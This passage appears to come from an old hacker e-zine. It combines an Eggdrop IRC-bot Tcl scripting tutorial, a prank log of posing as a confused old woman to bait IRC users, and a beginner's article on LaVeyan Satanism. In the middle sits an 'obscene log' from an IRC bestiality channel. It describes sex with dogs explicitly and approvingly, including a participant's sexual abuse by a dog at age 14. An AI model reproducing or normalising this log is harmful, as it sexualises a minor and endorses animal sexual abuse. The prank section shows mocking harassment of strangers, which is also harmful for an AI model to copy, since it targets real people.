was taken from tcl-commands.doc syntax for isop: isop returns: "1" if someone by that nickname is on the channel and has chop; "0" otherwise How do you use this in a if statement? This is how Example: if {[isop $nick $chan] == 1} { putmsg $chan "$nick is an op on $chan" } else { putmsg $chan "$nick is NOT an op on $chan" } Now the same can also be written like this: if {[isop $nick $chan] == 0} { putmsg $chan "$nick is NOT an on $chan" } and so on. Or like this: if {[isop $nick $chan] != 1} {body} or if {[isop $nick $chan] != 0} {body} As you can see you have many choices here, I suggest, since an else statement is optional, you use the if statement where the statement is true or false and execute the code, and don't use an else statement. What I mean by this is lets say you want the following: if the bot isn't an op then msg the chan and ask for ops. You can do this 2 ways, here is the harder way: if {[botisop $chan] == 1} { } else { putmsg $chan "Please opme! } As you can see I didn't want anything to happen if he does have ops, so you could change the first line to some thing like: if {[botisop $chan] != 1} {putmsg $chan "Please opme!"} or if {[botisop $chan == 0} {putmsg $chan "Please opme!"} TCL will interpert if {[botison $chan] == 1} {} the same as if {[botisop $chan]} {} If the statement is true it executes the {}. So there is no need for a == 1 As will if {[botisop $chan] == 0} {} if {![botisop $chan]} {} ! is the negate of whats in the [] Either one would suit you fine. There are 100's more commands like this for anything from checking flags, to doing ANY THING with the eggdrop. Again all in tcl- commands.doc (it almost sounds like I'm doing a commercial for tcl- command.doc dosn't it?). ## IV - String Manipulation Commands (string and l commands) ## You want to make a public kick program, so ops can type !kick . One problem, how do you extract those arguments from $text (or equivalent variable)? lindex, and lrange. These are core tcl commands so they won't be found in tcl- commands.doc here is there descriptions: (from the TCL help file). NAME lindex - Retrieve an element from a list SYNOPSIS lindex list index DESCRIPTION This command treats list as a Tcl list and returns the index'th element from it (0 refers to the first element of the list). In extracting the element, lindex observes the same rules concerning braces and quotes and backslashes as the Tcl command interpreter; however, variable substitution and command substitution do not occur. If index is negative or greater than or equal to the number of elements in value, then an empty string is returned. If index has the value end, it refers to the last element in the list. Example: [lindex "0 1 2 3 4 5 6 7 8 9 10" 5] would return 5 [lindex "a b c d e f g h i" 2] would return c (0 is the first parameter in the string!) Now here is the public kick program: bind pub O !kick pub:kick proc pub:kick {nick host hand chan text} { set whom [lindex $text 0] putserv "KICK $chan $whom :$nick told me so!" } # The Bind # public command (pub) flags needed to trigger: Channel Specific/Global Operator command to trigger: !kick procedure to be called: pub:kick # The Procedure # whom is a private variable and will be erased when the proc is finished. The lindex takes the first parameter in $text (which is the person) and sets it to whom the putserv kicks the person. What if you wanted to add a definable kick msg? Make the program a little more fancy. The command is lrange, it takes the parameters from N'th index to N'th index. Here it is from the TCL help file: NAME lrange - Return one or more adjacent elements from a list SYNOPSIS lrange list first last DESCRIPTION List must be a valid Tcl list. This command will return a new list consisting of elements first through last, inclusive. First or last may be end (or any abbreviation of it) to refer to the last element of the list. If first is less than zero, it is treated as if it were zero. If last is greater than or equal to the number of elements in the list, then it is treated as if it were end. If first is greater than last then an empty string is returned. Note: "lrangelist first first" does not always produce the same result as "lindexlist first" (although it often does for simple fields that aren't enclosed in braces); it does, however, produce exactly the same results as "list [lindexlist first]" So you would need to take parameter 1 for text, and to the end... This is how you would do it: bind pub O !kick pub:kick proc pub:kick {nick host hand chan text} { set whom [lindex $text 0] set reason [lrange $text 1 end] putserv "KICK $chan $whom :$reason" } Lets make it even more spoofy, what about if $nick isn't on the channel? Well we need an if statement don't we? Look in tcl- commands.doc for the command. Here is the program: bind pub O !kick pub:kick proc pub:kick {nick host hand chan text} { set whom [lindex $text 0] set reason [lrange $text 1 end] if {[onchan $whom $chan]} { putserv "KICK $chan $whom :$reason" } else { puthelp $chan "$nick: $whom is not on $chan" } } This is from the TCL help file, I'll give examples for a few, but I'm sure you can figure it out NAME string - Manipulate strings SYNOPSIS string option arg ?arg ...? DESCRIPTION Performs one of several string operations, depending on option. The legal options (which may be abbreviated) are: string compare string1 string2 Perform a character-by-character comparison of strings string1 and string2 in the same way as the C strcmp procedure. Return -1, 0, or 1, depending on whether string1 is lexicographically less than, equal to, or greater than string2. string first string1 string2 Search string2 for a sequence of characters that exactly match the characters in string1. If found, return the index of the first character in the first such match within string2. If not found, return -1. string index string charIndex Returns the charIndex'th character of the string argument. A charIndex of 0 corresponds to the first character of the string. If charIndex is less than 0 or greater than or equal to the length of the string then an empty string is returned. string last string1 string2 Search string2 for a sequence of characters that exactly match the characters in string1. If found, return the index of the first character in the last such match within string2. If there is no match, then return -1. string length string Returns a decimal string giving the number of characters in string. string match pattern string See if pattern matches string; return 1 if it does, 0 if it doesn't. Matching is done in a fashion similar to that used by the C-shell. For the two strings to match, their contents must be identical except that the following special sequences may appear in pattern: * Matches any sequence of characters in string, including a null string. ? Matches any single character in string. [chars] Matches any character in the set given by chars. If a sequence of the form x-y appears in chars, then any character between x and y, inclusive, will match. \x Matches the single character x. This provides a way of avoiding the special interpretation of the characters *?[]\ in pattern. string range string first last Returns a range of consecutive characters from string, starting with the character whose index is first and ending with the character whose index is last. An index of 0 refers to the first character of the string. An index of end (or any abbreviation of it) refers to the last character of the string. If first is less than zero then it is treated as if it were zero, and if last is greater than or equal to the length of the string then it is treated as if it were end. If first is greater than last then an empty string is returned. string tolower string Returns a value equal to string except that all upper case letters have been converted to lower case. string toupper string Returns a value equal to string except that all lower case letters have been converted to upper case. string trim string ?chars? Returns a value equal to string except that any leading or trailing characters from the set given by chars are removed. If chars is not specified then white space is removed (spaces, tabs, newlines, and carriage returns). string trimleft string ?chars? Returns a value equal to string except that any leading characters from the set given by chars are removed. If chars is not specified then white space is removed (spaces, tabs, newlines, and carriage returns). This is usefull for creating bans!!! Here is a sample kick ban script I wrote... proc pubm:kickban {nick host hand chan text} { set whom [lindex $text 0] set mask [trimleft [maskhost [getchanhost $whom $chan]] *!] set mask *!*$mask putmsg $chan "* Kick and Ban $nick ($mask) because [lrange $text 1 end]" putserv "MODE -o+b $whom $mask" putserv "KICK $whom :[lrange $text 1 end] } Notice I had to extract the person who is getting KB'd from text. I then had to get his host from the command getchanhost (tcl- commands.doc), and then make it a usable mask host for bans. However maskhost returns it's value in *!user@*.machine.end I need a *!*, so I used 'trimleft' and it did my job. string trimright string ?chars? Returns a value equal to string except that any trailing characters from the set given by chars are removed. If chars is not specified then white space is removed (spaces, tabs, newlines, and carriage returns). string wordend string index Returns the index of the character just after the last one in the word containing character index of string. A word is considered to be any contiguous range of alphanumeric or underscore characters, or any single character other than these. string wordstart string index Returns the index of the first character in the word containing character index of string. A word is considered to be any contiguous range of alphanumeric or underscore characters, or any single character other than these. ## V - Loops ## This section follows the following loops: foreach, for, and while (thanxs for the help from the people on the Doc Project List). Foreach a list of items, and goes through each setting it as a var then executing commands, and goes to the next. This proc will deop any one on the chan who doesn't have +o. syntax for foreach: foreach nick [chanlist $chan] { if {([isop $nick $chan]) && (![matchattr $nick o]) && \ (![matchchanattr $nick o $chan])} { pushmode $chan -o $nick } } chanlist gives a list of people on the chan. # The Procedure # It first checks to make sure he's an op Then checks to see if he's a global op Then checks to see if he's a chan op If all work out, he is deoped, if not nothing happens syntax for while: while {![botisop $chan]} { puthelp "PRIVMSG $chan :Opme!!!" } That will flood the bot off but you get the idea? It will execute body until the operator changes value syntax for for: for {set x 0} {$x > 5} {incr x} { puthelp "PRIVMSG $chan $x" } First of all this script will count from 1 to 6 The first set of {}'s happens only when U execute the for statement the second {}'s is the stopper. When that is true it will stop the body the third {} is every time you complete body, do it, then do body again ## VI - User-get/User-set ## Each user on eggdrop has a special field called "xtra" which lets you store whatever you like about users. The field size is limited so don't get too excited. :) It is a line where you (and your scripts) can store things the way you want to, just like the "comment" line each user has. But to improve it's functionality, there are two procedures which come with the "toolkit.tcl" (comes in eggdrops scripts dir) to access this field in a more organized way. The best thing is to *only* access the xtra field using these two procedures. Make sure no other script is accessing it another way (simple way to check this is to 'grep setxtra *' and 'grep getxtra *' in your scripts directory). The procs to use: user-set handle fieldname 'value...' user-get handle fieldname You can have any fieldname you like, like 'url' to store the users homepage, 'birthday', etc (check out 'set whois-fields' in eggdrops config file, which makes use of exactly these fields!). You name the field, set the value with user-set and don't have to worry anymore. And retore the value with user-get afterwards, as in: if {[user-get Ernst url] == ""} {putlog "Ernst has no url set"} ## VII - Return command ## The return command has two uses. The first is to stop the current proc. The second, and most usefull is the the abiity to return a number, or text. Heres an example: if {[chkaccess $nick]} { pushmode $nick +o $chan } chkaccess would return a 0, or 1 and then it would op them based on the return. This is from tcl-commands.doc: Several bindings pay attention to the value you return from the proc (using "return $value"). Usually they expect a 0 or 1, and failing to return any value is interpreted as a 0. Here's a list of the bindings that use the return value from procs they trigger: MSG Return 1 to make the command get logged like so: (nick!user@host) !handle! command DCC Return 1 to make the command get logged like so: #handle# command FIL Return 1 to make the command get logged like so: #handle# files: command PUB Return 1 to make the command get logged like so: <> !handle! command CTCP Return 1 to ask the bot not to process the CTCP command on its own. Otherwise it would send its own response to the CTCP (possibly an error message if it doesn't know how to deal with it). FILT Return 1 to indicate the text has been processed, and the bot should just ignore it. Otherwise it will treat the text like any other. FLUD Return 1 to ask the bot not to take action on the flood. Otherwise it will do its normal punishment. RAW Return 1 to ask the bot not to process the server text. This can affect the bot's performance (by causing it to miss things that it would normally act on) -- you have been warned. WALL Return 1 to make the command get logged liked so: !nick! msg syntax for return: return Example: return 0 ## VIII - Good Programming habits ## Many people load tons of scripts at once, and they don't want conflicts! There are a few ways to help avoid conflicts. USE RETURN 0 AS LITTLE AS POSSIBLE or else it will stop all bind searching after your proc.. Here are some other ideas (1) Label your procs sensable. Such as in my scripts I some times use proc mbti:antiidle {} {} Not some thing like proc script {} {} (2) Same with your variables. If you use '-'s in your variables when calling them you must ${mbti-antiidle} some thing like that (3) If your script uses timers make it compatable so you don't don't have too many of them (see examples in IX) If you've noticed in all my procecdures I've used an indentation system, I suggest you also use one. Most common methods consist of either a TAB or Double Spacing. where N is the number of spaces Example proc bla {} { <1> globlal testchan <1> if {[botisop $testchan]} { <1> <2> puthelp "PRIVMSG $testchan :I'm oped! <1> } } ## IX - Program Examples, then explained. ## I've taken some of these from programs I've written, or I just made them up =) (Many thanxs to the people on the Doc Project Listserv for suggestions!) ### bind pubm O !rules pubm:ab_rules proc pubm:ab_rules {nick host hand chan text} { set who [lindex $text 0] if {$who == ""} { # Because of line wraping it will not fit on one line, but you get the idea putmsg $chan "There is NO Cursing, Harrasment, Abusing the bot, Flooding, Clones, Advertising. Violation of this policy may result in a kick, and/or ban." return 1 } putmsg $who "There is NO Cursing, Harrasment, Abusing the bot, Flooding, Clones, Advertising. Violation of this policy may result in a kick, and/or ban." } # The Bind # Public Match Op Access on that Channel, or Global Op Access Trigger: !rules Proc Name: pubm:ab_rules # The Procedure # If the first parameter in $text is valid it will be set to who; if it doesn't exists whom will be "". Now it says, if who has no value msg the channel the rules of the channel But if there is a a nick put a msg to $nick #### ### # Script name : antiidle10-mbti.tcl # Script Version: 1.0 # Script Author : The |mmortaL [asn@cdc.net] (PGP Public key Avaible, put # "send key" in the subject.) # Script Desc. : An Anti Idle script for 1.1.x (Probably work with 1.0 # though) # Please edit the following variables: (Channel to which a msg is to be # sent, How often that message should be sent, and what to send; in that # order) set antiidlechan #lamechan set antiidletime 5 set antiidlemsg "antiidle10-mbti.tcl - Made By The |mmortaL" ## Do not change any thing under this point! ## ## Do not change any thing under this point! ## ## Do not change any thing under this point! ## # This makes all the data in $antiidlechan lower case set antiidlechan [string tolower $antiidlechan] # This makes sure that your on the channel which you specified. String # match is case sensitive that is why I made everything lower case # putlog is a command that puts some thing in the main logs of the bot, # and when the bot rehashs, or loads up you see that message. # return 1 stops the script from loading, in the event that it isn't on # that channel. if {![string match *$antiidlechan* [string tolower [channels]]]} { putlog "ERROR ERROR I am not on $antiidlechan!!!!" return 1 } # VERY VERY VERY VERY VERY VERY VERY IMPORTANT!! # If your script is gonna cause major problems if a person .rehashs, like # if you set a timer use some thing to this equivelent: # Make a variable, like antiidleloaded, by default that variable doesn't # exist. Put an if statement of info exists (checks to see if a variable # is there). And if it isn't set to 1, set it to 1, and load the timer, # if the variable is there, and set to 1, then do nothing. if {![info exists antiidleloaded]} { timer $antiidletime proc:antiidle set antiidleloaded 1 } proc proc:antiidle {} { global antiidlechan antiidletime antiidlemsg puthelp "PRIVMSG $antiidlechan :$antiidlemsg" timer $antiidletime proc:antiidle } # This is fairly simple, put a global statement for each of the global variables, because # you need to access them. Send the msg to the channel, and then re- set the timer. # The Bind # This script does not function with a bind. Trigger: "if {!info exists antiidleloaded}" checks to see if script is running Proc Name: proc:antiidle # The Procedure # If info does not exist for $antiidleloaded, timer for proc:antiidle begins, if it does exists, proc:antiidle continues running. When timer fires, put $antiidlemsg to $antiidlechan and start another timer ### ### set flag1 i set chanflag1 i set flag2 v set chanflag2 v bind join i * join:mbti_autoop bind join v * join:mbti_autovoice bind join - * join:mbti_cautoop bind join - * join:mbti_cautovoice proc join:mbti_autoop {nick host hand chan} { pushmode $chan +o $nick } proc join:mbti_autovoice {nick host hand chan} { pushmode $chan +v $nick } proc join:mbti_cautoop {nick host hand chan} { if {[matchchanattr $hand i $chan]} {pushmode $nick +o $chan} } proc join:mbti_cautovoice {nick host hand chan} { if {[matchchanattr $hand v $chan]} {pushmode $nick +v $chan} } This is a fairly easy script, the only new thing is the newflags. Eggdrop lets you add as many new flags as there aren't used. Set newflag[num] z where [num] is a number that doesn't exists... set newchanflag[num] Ditto :P # The Bind # Join on channel AutoOp and AutoVoice Access on that Channel Trigger: users with +i or +v joining the channel Proc Name: join:mbti_autoop join:mbti_autovoice join:mbti_cautoop join:mbti_cautovoice # The Procedure # When join bind is triggered by specified users, pushmode $nick flag $chan or matchchanattr $hand flag $chan is true pushmode $nick flag $chan ### ### bind mode - "*+o $botnick*" mode:automode proc mode:automode {nick host hand chan modechg} { foreach nick [chanlist $chan] { set hnick [nick2hand $nick] if {![isop $nick $chan]} { if {([matchattr $hnick o]) || ([matchchanattr $hnick o $chan])} { pushmode $chan +o $nick } if {([isop $nick $chan]) && ([matchchanattr $hnick d $chan])} { pushmode $chan -o $nick } } } } foreach nick [chanlist $chan] basicly says to do this for every one in the chan. One check to see if he has ops, if he dosn't and he has OP access then op him!! Then If he has ops, and he's supposed to be deoped them deop him! ### # end !@#$ 0000000000000000000000000000000000000000000000000000000000000000000000 000 0000000000 0000000000000000000000000000000000000 000000000000 000 00000000 00000000000000 00000 000 000000 0000 000 000 00000000 0 0000000000000 00000 00 00000 00000 000 000 000 0000000 000 000000000000 0000 00 0000 00000000 000 000 000 0 00 000 000 00 00 0 000 0 00 00 000 000 0 000 00 00 00 0 000 00 00 00 000 000 00 0 000 00 00 00 0000 00 0000 00 000 00 00 000 000 0000 0 000 0 0000 00 0000 00 0000 00 000 00 00 000 000 0000 0 000 0 0000 00 0000 000 0000 00 000 00 00 000 000 0000 0 000 0 0000 00 0 00 00 000 00 00 000 000 0000 0 000 0 0000 000000 00 00 000 00 00000000 000 000 0 000 00 00 00000000 00 00000 00 00 00 00000000 000 0 0 0 0 00 000 000 00000 000 00 000 000 00 000 00 000 000 0000000 000000000000 000 000000000000000 00000000000 00000000000000000000 00000000000000000 00000000000000000000000 0000 000000000000000000000 00000000000 00000000000000000000000 00000000000000000000000 000000000000 00000000000000000000000 0000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000 [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 6 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::::: Obscene log � #gaydogsex � irc.undernet.org :::::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] true, so tell me what is sex with a dog like? umm.. good.. :) don't they get bit roough? if you're lucky :) thay can do, if you're lucky :) do they bite? yes, again. if you're lucky.. * PantheraD likes it rought. err.. rough sound painful not pleasurable all depens on what you like.. some dogs are rough.. some aren't don't know what i would like. never tried it with a dog have you had sex with a man? couple of times was he rough with you? nah, pretty gentle actually well, did you want him to be rough? *** Roxie_Dog has quit IRC (Read error to Roxie_Dog[modem- 214.iron.dialup.pol.co.uk]: Connection reset by peer) not really you woudn't want a rough dog then. *** Roxie_Dog has joined #gaydogsex *** Knot sets mode: +v Roxie_Dog wb roxie :) does this mean that i should stay away from dogs no cool, still want to try just be aware that dogs won't alter the way the fuck because it's to rough for you.. panthera.. how many diff breeds and dogs have you had sex with? i guess i could deal with that well, i used to work at a kennel so a lot :) heh. really? * PantheraD nods for 3 years variety is the spice of life, eh? and?!? so true.. :) and what? heh.. n/m what got you turned unto dogs? but i always had my favorite. :) saw my male lab breeding a female and i wondered what it would be like to be with him *** nik7 has joined #gaydogsex how was it hello nik, whass up>? and did you you? yes.. that i did :) how did you get him to do that with you? jacked him a little until he started to hump, then showed him my butt. ahh. and did you enjoy? the first time, no. why not i was quite young and he was very well hung... ie, small butt, big cock makes sense, how old were you 14 and how old was he 5 no longer a pup did you ever do anything with him again? nope.. oh yes.. he was my lover for 4 years every night after.. err.. no, he was not a pup... sorry.. that was a bit confusing.. how did you get past the size difference he was very used to breeding... ever tried any other animal than dogs? well, heh.. he just rammed it in and stretched me out... it must have hurt no.. just men and dogs.. i want to try a stallion at some point yes, yes it did did he ever get his knot in you wow. a stallion huh? woo. big. yeah, he did it the first time and just about every time there after.. (i prefer to tie) yeah! nice big cock and a nice big load of cum :) i hear knots get huge biggest i've seen was the size of a softball (247 lb st. bernard) [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 7 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ :::::::::::::: grannanizing � Prae � prae@talk21.com ::::::::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] Here it is! What you've all been waiting for.. It's a revolution in home entertainment! No it's not a hands-free vibrator or even an inflatable doll that gives head without chaffing your penis! It's my latest party trick, its called 'Grannanizing'.. And since I'm such a nice person I am going to show you how I do it. :) Here is what I do.. I /msg someone and I act like an old lady who is a bit nutty.. oh hello dear hi i was wondering if you could help me? depends its disgusting! huh am i speaking to the right person? i don't know are you? why? that jigsaw is driving me nuts! umm ok.. wtf are you talkin about are you still there? possibly i was wondering if you could help me? yes you asked that once woo its sexy dude you smoked some bad crack or somethin oh how dare you?! how dare i what what are you gonna do? i cant believe you're asking me that ok..... are you still there? man your fuckin loony hello betty seek help please betty? yes umm my name is not betty in my day it never cost that much yeah. dildos are much cheaper now its disgusting! your the one who brought it up why? i don't know.. you tell me am i speaking to the right person? do you purposly repeat your self or are you really stupid? oh how dare you! can you put me through to the person in charge? are you still there? goodbye dear. oh hello dear hello, who are u its fanny speaking i was wondering if you could help me? oki. am i speaking to the right person? i dont know i was wondering if you could help me? oki, with wht what its disgusting! tell me in my day it never cost that much are you still there? goodbye dear oh hello dear hi >=] i was wondering if you could help me? with? its disgusting! what is? in my day it never cost that much! are you still there? yeah am i speaking to the right person? what are you talking about? no i dont think so why? prae - what the hell are you smoking? yes, its fanny speaking are you still there? goodbye dear oh hello dear hi i was wondering if you could help me? ok why didnt your ip resolve its disgusting! :( in my day it never cost that much huh am i speaking to the right person? ? are you drunk? that jigsaw is driving me nuts what the fuck are youtalking about? are you still there? yes i was wondering if you could help me? WITH WHAT that jigsaw is driving me nuts hello betty WHAT FUCKING JIGSAW i cant believe you're asking me that oh how dare you!? are you still there? goodbye dear oh hello dear Hi . i was wondering if you could help me? Hm ? its disgusting! What ?! in my day it never cost that much -laugh Do you need a loan ? am i speaking to the right person? Who knows . that jigsaw is driving me nuts I bet . You should cut back on the alcohol . its disgusting! I bet . oh how dare you? Easily . . . are you still there? For now . i was wondering if you could help me? Mayhaps . woo its sexy Is it ? i cant believe you're asking me that Well , I did . oh how dare you1? hello betty are you still there? goodbye dear oh hello dear lol.. hi prae i was wondering if you could help me? with? its disgusting! ? am i speaking to the right person? i dont know. that jigsaw is driving me nuts whom do you think you are addressing ? yes, its fanny speaking huh? am i speaking to the right person? i dont know.. are you on my left? its disgusting! in my day it never cost that much are you still there? goodbye dear oh hello dear hi :( i was wondering if you could help me? with? its disgusting! are you still there? goodbye dear oh hello dear i was wondering if you could help me? are you still there? I'm here i was wondering if you could help me? depends, what do you need? its disgusting! are you still there? yes, I am...what do you need help with? that jigsaw is driving me nuts are you still there dear? in my day it never cost that much woo its sexy are you still there? goodbye dear oh hello dear hi i was wondering if you could help me? with? do I know you? its disgusting! ? in my day it never cost that much ? are you still there? yes i was wondering if you could help me? with? i cant believe you're asking me that am i speaking to the right person? stop begging for help and tell me wtf you want help with oh how dare you!? I don't know why? who do you think you are speaking to? woo its sexy yes, its fanny speaking fanny? yes am i speaking to the right person? your hostmask seems familiar but I don't know anyone by the name of fanny ok luvvy are you still there? goodbye dear oh hello dear i was wondering if you could help me? with? its disgusting! are you still there? yes i was wondering if you could help me? i was waiting for you with what? i cant believe you're asking me that enough games, whats on your mind its disgusting either spit it out, or i have other business am i speaking to the right person? the right person for what you know exactly who i am and i know exactly who you are come to the point can you put me through to the person in charge? i am the person in charge in my day it never cost that much you are obviously insane, let me know when you return to earth oh how dare you!? are you still there? yes, and very busy that jigsaw is driving menuts! yes, i can see you are quite nuts are you still there? OH HOW DARE YOU!? hello betty i was wondering if you could help me? go and take your meds woo its sexy are you still there? no why? yes, its fanny speaking are you still there dear? goodbye dear ok here. =] oh hello dear i was wondering if you could help me? hah yes yes its disgusting! it is?! yes that jigsaw is driving me nuts! haha what jigsaw are you still there? and whats disgusting?! yes. are you stoned per chance? i cant believe you're asking me that :/ am i speaking to the right person? probably not... i think you want a shrink.. oh how dare you!? well i don't know? woo its sexy yes i have jammy dodgers... why? i dont know i dont really like them i just eat cos im bored are you still there? goodbye dear oh helo dear hi do i know u i was wondering if you could help me? with what? its disgusting! with what? in my day it never cost that much really yes am i speaking to the right person? yeah what never cost that much thats not important i was wondering if you could help me? yeah sure its disgusting! are you still there? yes i am what do u fucking want me to do just tell me could you put me through to the person in charge? 10 seconds oh how dare you!? no sorry why? fuck off woo its sexy are you still there? fuckign hell its sexy i know u r telling me omg its so sexy yes its disgusting! i know its so fucking disgusting its just digusting so groose and disgraceful that jigsaw is driving men uts ohh its o giisgusting its unreal could you put me through to the person in charge? yeah, eyghhh why do u wanna speak to the person in charge u realise u will have to take the test thats not important why? if u want to speak with the person in charge thats the protocol hello betty i am affraid why? are you still there? goodbye dear oh hello dear Um Hi. i was wondering if you could help me? Do I know you? i cant believe you're asking me that Ok... am I supposed to know you? thats not important i was wondering if you could help me? With what? its disgusting! Just ask the question. ok luv are you still there? YES. wo its sexy [Accipiter PING] are you still there? YES. Ask the question already. oh how dare you!? what who am i speaking to the right person? Apparently. Ask me what it is you want to ask. can you put me through to the person in charge? yes i'm still here. I am in charge. its disgusting! That's fine., ask. that jigsaw is driving me nuts A jigsaw puzzle is disgusting? you have issues. woo its sexy are you still there? No. I'm lying. its disgusting! I'm sure it is. hello betty hello dolly ? oh how dare you!? are you still there? goodbye dear [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] [ b0g article # 8 :::::::::::::::::::::::::::::::::::::::::::::: b0g ] [ ::::::::::: Satanism � Vegtam - vegtam@fjell.online.no ::::::::: ] [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ] Do you want to be a satanist? Or do you want to know what a satanist is? Well, the answers will be found her . This is a course for beginners. The more skilled one can fuck off and read something else. I will only tell how to be a Satanist as a follower of Anton Szandor LaVey, and not as a devil-worshipping jerk that sacrifices young virgins. I will only do it briefly, tell you the basics, so if you want to know more, go to http://www.churchofsatan.com. I will now try to combine clothing style, music and the rules of being a satanist. Ok, first of all, to be a Satanist, you should dress like one. Have style. The basic color is of course BLACK (and due to that fact, it`s even better if you are black skinned). You can use other colors like red and purple, but it must match, so you have the gloomy look. Your hair should be long, and colored black. You also can be shaved. Spikes and leather jackets gives you a raw and primitive look. But you can try to look a little mystical. Wear a black coat or something. Black latex will never run out of date when you are a satanist. And always use army boots, or something look-a-like. If you are white, make sure your face is as pale as it can be. Never take sun. That ruins your evil look. Some people thinks it`s funny to use corpse painting...but if your walking in mall or something with corpse painting, your stupid...and remeber, it`s no sin to be original... You should also listen to so called dark, moody n Satanic music that get u in a dark and gloomy mood, and I don`t mean a stupid a g1mp like Marilyn Manson (many will maybe disagree, but he`s nothing but a jerk off to me. A false rip off). Listen to classical music. Listen to brutal music from the north, black metal. The most famous ones that is worth a mention is Mayhem, Darkthrone, Immortal, Emperor, Enslaved, Vintersorg, Satyricon, early Ulver, Finntroll....blablabla...well, at least you have something to start with? Well, if you got the clothing style and maybe even started to like the so called "satanic" music, we are now ready for the the lesson on how to behave and act. I will now take up "The Nine Satanic Statements", "The Elven Satanic Rules of the Earth" and "The Nine Satanic Sins". When you have read these, and if you still are interested in being a Satanist, buy the Satanic Bible and visit http://www.churchofsatan.com, as mentioned somewhere above. Okay, here we go: The Nine Satanic Statements from The Satanic Bible by LaVey 1. Satan represents indulgence instead of abstinence! 2. Satan represents vital exitstence instead of spritual pipe dreams! 3. Satan represents undefiled wisdom instead of hypocritical self- deceit! 4. Satan represents kindness to those who deserve it instead of love wasted on ingrates! 5. Satan represents vengeance instead of turning the other cheek! 6. Satan represents responsibility tho the responsible instead of concern for psychic vampires! 7. Satan represents man as just another animal, sometimes better, more often worse than those that walk on all fours, who, because of his "divine spiritual and intellectual development," has become the most vicious animal of all! 8. Satan represents all of the so-called sins, as they all lead to physical, mental, or emotional gratification! 9. Satan has been the best friend the Church has ever had, as He has kept it in business all these years! The Eleven Satanic Rules of the Earth by LaVey 1. Do not give opinions or advice unless you are asked. 2. Do not tell your troubles to others unless you are sure they want to hear them. 3. When in another`s lair, show him respect or else do not go there. 4. If a guest in your lair annoys you, treat him cruelly and without mercy. 5. Do not make sexual advances unless you are given the mating signal. 6. Do not take that which does not belong to you unless it is a burden to the other person and he cries out to be relieved. 7. Acknowledge the power of magic if you have employed it successfully to obtain your desires. If you deny the power of magic after having called upon it with success, you will lose all you have obtained. 8. Do not complain about anything to which you need not subject yourself. 9. Do not harm little children. 10. Do not kill non-human animals unless you you are attacked or for your food. 11. When walking in open territory, bother no one. If someone bothers you, ask him to stop. If he does not stop, destroy him. The Nine Satanic Sins by LaVey 1. Stupidity - The top of the list for Satanic sins. The Cardinal Sin of Satanism. It`s too bad stupidity isn`t painful. Ignorance is one thing, but our society thrives increasingly on stupidity. It depends on people going along with whatever they are told. The media promotes a cultivated stupidity as a posture that is not only acceptable but laudable. Satanists must learn to see through the tricks and cannot afford to be stupid. 2. Pretentiousness - Empty posturing can be most irritating and isn`t applying the cardianl rules of Lesser Magic. On equal footing with stupidity for what keeps the money in circulation these days. Everyone`s made to feel like a big shot, whether they can come up with the goods or not. 3. Solipsism - Can be very dangerous for Satanists. Projecting your reactoins, responses and sensibilities onto someone who is probably far less attuned than you are. It is the mistake of expecting to people give you the same consideration, courtesy and respect that you naturally give them. They won`t. Instead, Satanists must strive to apply the dictum of "Do unto others as they do unto you." It`s work for most of us and requiers constant vigiliance lest you slip into a comfortable illusion of everyone being like you. As has been said, certain utopias would be ideal in nation of philosophers, but unfortunately (or perhaps fortunately, from a Machiavellian standpoint) we are far from that point. 4. Self-deceit - It`s in the "Nine Satanic Statements" but deserves to be repeated here. Another cardianl sin. We must not pay homage to any of the sacred cows presented to us, including the roles we are expected to play ourselves. The only time self-deceit should be entered into is when it`s fun, and with awareness. But then, it`s not self-deceit! 5. Herd Conformity - That`s obvious from a Satanic stance. It`s all right to conform to a person`s wishes, if it ultimately benefits you. But only fools follow along with the herd, letting an impersonal entity dicate to you. The key is to choose a master wisely instead of being a enslaved by the whims of the many. 6. Lack of Perspective - Again, this one can lead to a lot of pain for a Satanist. You must never lose sight of who and what you are, and what a threat you can be, by your very existence. We are making history right now, every day. Always keep the wider historical and social picture in mind. That is an important key to both Lesser and Greater Magic. See the patterns and fit thingd together as you want the pieces to fall into place. Do not be swayed by herd constraints - know that you are working on another level entirely from the rest of the world. 7. Forgetfulness of Past Orthodoxies - Be aware that this is one of the keys to brainwashing people into accepting something new and different, when in reality it`s something that was once widely accepted but is now presented in a new package. We are expected to rave about the genius of the creator and forget the original. This makes for a disposable society. 8. Counterproductive Pride - That first word is important. Pride is great up to the point you begin to throw out the baby with the bathwater. The rule of Satanism is: if it works for you, great. When it stops working for you, when you have painted yourself into a corner and the only way out is to say, I`m sorry, I made a mistake, I wish we could compromise somehow, then do it. 9. Lack of Aesthetics - This is the physical application of the Balance Factor. Aesthetics is in important in Lesser Magic and should be cultivated. It is obvious that no one can collect any money off classical standards of beauty and form most of the time so they are discouraged in a consumer society, but an eye for beauty, for balance, is an essential Satanic tool and must be applied for greatest magical effectivness. It`s not what`s supposed to be pleasing - it`s what is. Aesthetics is a personal thing, reflective of one`s own nature, but there are universally pleasing and harmonious configurations that should not be denied. ---------------------------------------------------------------------- Okay, I was planning to do a littel satanic history here, but I won`t. I`m tired of writing this article, but I hope you read it and found at least some of it interesting, or even better, got provoked by it. Vegtam february 2000 000 00000 000 00 00 00000 000 000 0000000 000 00 00 00000000 000 000 000000000 000 000 00 000 000 000 000 00 000 0000 000 00000000000 000 0 000 000 000 0000 0000 000 00000000 000 000000000000 00 00000000 000 000000000 0000 000 000000000 000 000000000000 000 0000000 00 000 0000000000 0000 000 0000 0000 000 00 00 00 000 000 00 000 000 0000 0000 000 0000 0000 000 000 00 00 000 000 00 000 000 0000 0000 000 000 0000 000 000 00 00 000 000 00 000 000 0000 0000 000 000 0000 000 00000000000 00 000 000 00 000 000 0000 0000 000 000 0000 00 00000000000 00 000 000 00 00 000 0000 0000 000 0000 00000 00 00 000 0000000000 00000000 0000000000 000000000 000 000 00 00 000000000 000 00000000 00000000 000000000 000 000 000 000 00 00000 000 000000 000000 000 0000 000 00 00 000 000 